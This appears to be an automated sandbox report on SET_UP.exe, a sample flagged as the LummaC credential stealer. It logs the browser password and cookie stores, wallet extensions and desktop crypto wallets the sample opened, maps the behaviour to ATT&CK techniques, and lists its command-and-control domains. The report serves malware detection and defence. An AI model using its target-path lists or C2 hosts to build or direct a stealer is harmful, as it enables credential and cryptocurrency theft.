              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SET_UP.exe8%ReversingLabs
              SET_UP.exe4%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://glowscarrytsv.sbs/apiwg0%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/0%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/api70%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/api90%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/apia0%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/apim0%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/apis0%Avira URL Cloudsafe
              http://crl.micro80%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/api100%Avira URL Cloudmalware
              https://glowscarrytsv.sbs/apiv0%Avira URL Cloudsafe
              https://glowscarrytsv.sbs/B0%Avira URL Cloudsafe
              glowscarrytsv.sbs0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              glowscarrytsv.sbs
              		188.114.97.3
              		truetrue
                		unknown
                198.187.3.20.in-addr.arpa
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://glowscarrytsv.sbs/apitrue
                  • Avira URL Cloud: malware
                  		unknown
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            glowscarrytsv.sbstrue
                            • Avira URL Cloud: safe
                            		unknown
                            framekgirus.shopfalse
                              		high
                              tirepublicerj.shopfalse
                                		high
                                abruptyopsn.shopfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://glowscarrytsv.sbs/apiwgSET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://glowscarrytsv.sbs/apiaSET_UP.exe, 00000000.00000002.1906733986.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
